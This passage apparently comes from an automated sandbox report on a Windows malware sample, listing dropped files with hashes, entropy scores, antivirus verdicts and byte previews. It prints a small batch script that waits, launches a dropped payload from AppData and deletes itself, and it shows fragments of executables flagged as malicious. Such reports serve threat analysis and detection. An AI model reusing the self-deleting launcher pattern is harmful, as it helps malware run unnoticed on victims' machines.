Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.1.8.0.1.2.4.9.2.7.3.8.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.1.8.0.1.2.9.3.0.1.3.4.9.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.2.4.6.0.4.0.2.-.3.5.6.9.-.4.c.d.0.-.8.7.7.c.-.2.4.2.9.d.5.2.e.9.1.0.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.1.c.6.1.f.7.9.-.d.3.d.9.-.4.b.4.9.-.a.8.9.a.-.6.8.7.f.2.b.8.8.4.c.9.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.2.3.5.c.-.0.0.0.1.-.0.0.3.a.-.6.f.2.4.-.9.a.b.e.2.c.0.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.R.e.g.A.s.m...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D62.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6316
Entropy (8bit):	3.721219809415016
Encrypted:	false
SSDEEP:	96:R7IU6o7lZt3ioj61x0YPWBOvzcuujujQkaMQUt89bARsfmgm:R9l7lZNioj6T0YPPppDt89bARsfmgm
MD5:	12030DBBC9AD9117ED5E4C413282CE0E
SHA1:	F4F03A651C572BEA8BC2B0DA56AC96A3409AA88C
SHA-256:	24F1385696A7D1799AAC99E45C48A1D7313B062EC433653C55D4AC2E121D2123
SHA-512:	8978D6B2F90B1F55258763DB6FB0E13273805B724D5EDE15CF6E5C4047281F56C45B0040EB72140014EBC68BBEEDA00BCBE82F457D2D8A2B42F1BA2616A14034
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.9.0.5.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DA1.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	4819
Entropy (8bit):	4.592940891920502
Encrypted:	false
SSDEEP:	48:cvIwwtl8zsUe702I7VFJ5Ws2mYrjEhs3rm8M4JTvrF+L+q8FEdYZQgLuOLuFd:uILf57GysbYHJjMGgYZBukuFd
MD5:	392EB5F4429D05F84EE9FD6586BEF9FF
SHA1:	560C68B6CA4FD3D444D36C4CEA0AB6C2DC43D70B
SHA-256:	4890D87B56E846A664545BB000FB16079D3CA1C4ED546DCDB55B6F3655E7AE3F
SHA-512:	21A44692FB0A8CB397995D898270A9485D80CDCC27BC5969B44B5EE60CDD72EFA48D29A15A4F138B74089330F37B7D87534B1F7B53792C5D705821750D4711A0
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222850284" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DAE.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	91532
Entropy (8bit):	3.109290965633871
Encrypted:	false
SSDEEP:	1536:kNJnGAVVv4f7vjPRT7PpsMlcWmtI6eydynm7tGtHq1OHyNGJtyNVUtOtHwOQ5qw2:kNJnGAVVv4f7vjPRT7hsMlcWmtI6eydv
MD5:	EDF8013188BF5C2D020A2FEF3D50CB3C
SHA1:	43CA458A66558E1D950F14A0B62F694E479E0F1C
SHA-256:	19E41788D622C52E462A3AE405461E252764D838A1E9EDA45C544CE771596845
SHA-512:	D0CFC37B1AED8C6229760993C6575ADD6ED9E0D7335498B6063C9C07052D8E0493CAED29A49B4E099E096B340CC78860465748C73EDCBCB1C34FCFCC76CA8094
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E3C.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.7097734850453663
Encrypted:	false
SSDEEP:	96:KilQzMuaLqVYCYEWaHrYEZPFtliI8Dtuw8wqa899Mz7AeIQ13:flQl1P1fa899Mz7ApQ13
MD5:	EFDEEF18D578DBC713288842955CCBFC
SHA1:	3A4ADF75513FFE4BA18DD6260A99EED988999848
SHA-256:	2EE6A56D4F854218371F9705BF311FCF948DF0E5B1DC6BDEEA91A32C208FDAFC
SHA-512:	D0FE79F5AC4689CF8389CAB04BB38204174AF11BFA3E7EE8A483B77ACA4D0EE8307504AFA1D9C9F612BEA557BD28BC79783E7DFAB9CB1946C90C91F976E4C06A
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.7.0.6.2.1.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .4.6.3.8.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Current.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	838
Entropy (8bit):	5.348329480142154
Encrypted:	false
SSDEEP:	24:ML9E4KpKDE4KGKY3RKhRAE4KKtYTsXE4c974:MxHKpYHKGroRAHKKtHD
MD5:	BD7F5A09BBF2B215004BEAB8AE6A2AE3
SHA1:	F28DF4D4CB35872A6FE37DA8863A63D18D890684
SHA-256:	008F6F602020982D596E063921A36BF3CF1BEF391D3548FA6A30A894706ECDAD
SHA-512:	D3CE98CB87B0EDD2D58F0ECCE574DA70C02140BB194644825FC77C79D48B82BFC93529381AD41A29331780CF472883E5A711AE9C73027BD7F7F6F3D434CE0F2F
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\372e9962a41f186f070f1cb9f93273ee\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\dbf675a2e7564fd29ec8b82b29a1a2fe\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\eab83bdd6eee1b956e2c8aef88914cc1\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\a00d58ba692a8febe63782689321bb04\System.Management.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\YZRVUYjilL.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\YZRVUYjilL.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	838
Entropy (8bit):	5.348329480142154
Encrypted:	false
SSDEEP:	24:ML9E4KpKDE4KGKY3RKhRAE4KKtYTsXE4c974:MxHKpYHKGroRAHKKtHD
MD5:	BD7F5A09BBF2B215004BEAB8AE6A2AE3
SHA1:	F28DF4D4CB35872A6FE37DA8863A63D18D890684
SHA-256:	008F6F602020982D596E063921A36BF3CF1BEF391D3548FA6A30A894706ECDAD
SHA-512:	D3CE98CB87B0EDD2D58F0ECCE574DA70C02140BB194644825FC77C79D48B82BFC93529381AD41A29331780CF472883E5A711AE9C73027BD7F7F6F3D434CE0F2F
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\372e9962a41f186f070f1cb9f93273ee\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\dbf675a2e7564fd29ec8b82b29a1a2fe\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\eab83bdd6eee1b956e2c8aef88914cc1\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\a00d58ba692a8febe63782689321bb04\System.Management.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PT54FFSL7ET46RASB.exe.log

Download File

Process:	C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\l6E.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\l6E.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:NlllulgkLZ:NllU
MD5:	C1AA1D28144A13E317F3F4D85AC26B7D
SHA1:	2ADF74F16F1031DA80E1E096946EB8872F716876
SHA-256:	EB50A98ECA168B1B64C7DB0C33AE77B83B84F492032BD1BCB26AFE571DBE2839
SHA-512:	B92300874DD39C4304C852D59177D0E33A3A39D6ABB8DE5C86E9A2EC46268BC9E4AFD2BF3F1441D37F97E217EA296556EF2F9F62B346D0DDBF2EA9DB978B4CBE
Malicious:	false
Preview:	@...e.................................,..............@..........

C:\Users\user\AppData\Local\Temp\QgL1KOz6bqKO.bat

Download File

Process:	C:\Users\user\AppData\Roaming\glmIOFfdMi.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	168
Entropy (8bit):	5.159890850600577
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLqFvEROr+jn9m1KJiApEaKC5i0ZBktKcKZG1KJiApE2J5xAIP/lz4H:hCRLqFcROr+DE1KJjqaZ5i0ZKOZG1KJG
MD5:	5711F390C44CD951E1193581BA679419
SHA1:	ADF644C7357425E2E27F776D740DAB75343AAAE2
SHA-256:	FA2269F7976BB243DE56CBAF6C052AFBEB0E8D430FBDAEFF64CE353C5DD8763B
SHA-512:	17F3F32AAC047241E3FCE96D707CC70D9AFF055B7BF73151C2B2E9579CA21DA2389D1DD83F797B5F42808AE0F224D16D942A8D7E5FCE2DAE5C2FCA22315AD307
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 5 localhost > nul..start "" "C:\Users\user\AppData\Roaming\l6E.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\QgL1KOz6bqKO.bat"

C:\Users\user\AppData\Local\Temp\WER8D92.tmp.WERDataCollectionStatus.txt

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	4788
Entropy (8bit):	3.2564484980908808
Encrypted:	false
SSDEEP:	96:pwpIi3kXkkXpk2wuWm0Q60QU0Qgl0QXc0QQ0QBgrYg5XQIszeuzSzbxGQI5cmAtj:pCl4+uKm5oeyOkNY
MD5:	CA5409D093641C99AD53C6075D1B2A2D
SHA1:	0878EF0893B949D518951ED2D7A07D3AB877498C
SHA-256:	6A372083ABA2BA01F601FA61B9E6066D5A548E7876EC837D2BB405C5E186B075
SHA-512:	AD87498C5DA5C1B4F7FAF17099D38EFCF1DC86393245D912C3A7A55F4E6FC14107CAD5E1964E53E0976EE854F5965344B61D01D6D9CE5B37440D76351B629387
Malicious:	false
Preview:	......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .6.0.1.8.4. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .3.9.5.9.2. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1.0. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2.0. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .9.4.8.2.9.9.4.8. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . .

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ummstdg.dxy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1p3vxcsi.j0z.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bu2xlvlc.qyd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dyifdkwg.qgd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe

Download File

Process:	C:\Users\user\AppData\Roaming\YZRVUYjilL.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	729600
Entropy (8bit):	7.955187915697694
Encrypted:	false
SSDEEP:	12288:7egbADMgyjwvQ4+IHqhIs2SXdBG2DtMM2rvzaUwvEZmKHX:7vJjcvQhIK27em4tgDwvsmK3
MD5:	FD3AD0AE7FE1BBEE4B2F2BD43A359393
SHA1:	60AE0666DA4A38F4881511149CE3BE848844B9FD
SHA-256:	7BFFD9CB271221C63B35A30160859EC4F2FF2BA131597D1F746C279FB53D1AD7
SHA-512:	BA5250CD1D7D301B3070083053477319D1FCFA3AFC38533DE5BBEFD1251C6D73B1F24DA08C37FDB2715E67B07C0799C89E59DDAA16F2EB7117EAD977E453E88C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Joe Sandbox View:	Filename: o9OIGsDt4m.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...]/................0.................. ....@...... .......................`............`...@......@............... ...............................@..h............................................................................................ ..H............text........ ...................... ..`.rsrc...h....@......................@..@........................................H............U..............................................................(......0..........8{...... ....o....8U..... ..:sf .r..a~w...{>...a(...(....o....8........o......o....o......8....s......8,..... .... ...a~w...{q...a(...(....o....8.....s......8..... `?.......%.....(....s......8..........s......8.........o....8......o....s......8.............8..........o....&8.......(......8.......s......8.........o....8l....+...(...... .LX8 #.Z.Y ...{a~w...{....a(...( .........o!...&8<

C:\Users\user\AppData\Roaming\YZRVUYjilL.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	729600
Entropy (8bit):	7.955187915697694
Encrypted:	false
SSDEEP:	12288:7egbADMgyjwvQ4+IHqhIs2SXdBG2DtMM2rvzaUwvEZmKHX:7vJjcvQhIK27em4tgDwvsmK3
MD5:	FD3AD0AE7FE1BBEE4B2F2BD43A359393
SHA1:	60AE0666DA4A38F4881511149CE3BE848844B9FD
SHA-256:	7BFFD9CB271221C63B35A30160859EC4F2FF2BA131597D1F746C279FB53D1AD7
SHA-512:	BA5250CD1D7D301B3070083053477319D1FCFA3AFC38533DE5BBEFD1251C6D73B1F24DA08C37FDB2715E67B07C0799C89E59DDAA16F2EB7117EAD977E453E88C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Joe Sandbox View:	Filename: o9OIGsDt4m.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...]/................0.................. ....@...... .......................`............`...@......@............... ...............................@..h............................................................................................ ..H............text........ ...................... ..`.rsrc...h....@......................@..@........................................H............U..............................................................(......0..........8{...... ....o....8U..... ..:sf .r..a~w...{>...a(...(....o....8........o......o....o......8....s......8,..... .... ...a~w...{q...a(...(....o....8.....s......8..... `?.......%.....(....s......8..........s......8.........o....8......o....s......8.............8..........o....&8.......(......8.......s......8.........o....8l....+...(...... .LX8 #.Z.Y ...{a~w...{....a(...( .........o!...&8<

C:\Users\user\AppData\Roaming\glmIOFfdMi.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	352768
Entropy (8bit):	7.854006767539572
Encrypted:	false
SSDEEP:	6144:dN1noCMJh6qP/LEkjKVP4vWtL9KeaIQ3Wjn2XJBck0XU9EljKwt0bRg:IS6/Ykj0P4vWtL9Kk6KOBfUx+Qyg
MD5:	C164ED9887BD51CBA150379514DC4E81
SHA1:	178639B8961FA5236683498E06F78B8887155999
SHA-256:	B748235A791B5F8C5B80202EF3345BC8325A7EA246B004D57DF5521E2F79B429
SHA-512:	778DED0EE041DC7710AAA8B76BB3C7ABF319744BEA48BBA91F2013CEA2B1704DFAADABBC675B4035AC3C0DB68AE046B3737E8E42815FB864B6A146B575CBD65A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....D...............0..X..........nw... ........@.. ....................................@................................. w..K.......p............................................................................ ............... ..H............text...tW... ...X.................. ..`.rsrc...p............Z..............@..@.reloc...............`..............@..B................Pw......H.......P...XR..............................................................(......(......0..l.......(...... ....o..... .Z.p ..!a~M...{{...a('...(....o..... XE. .@.ka~M...{>...a('...(....o......o.....o....o.....s..... 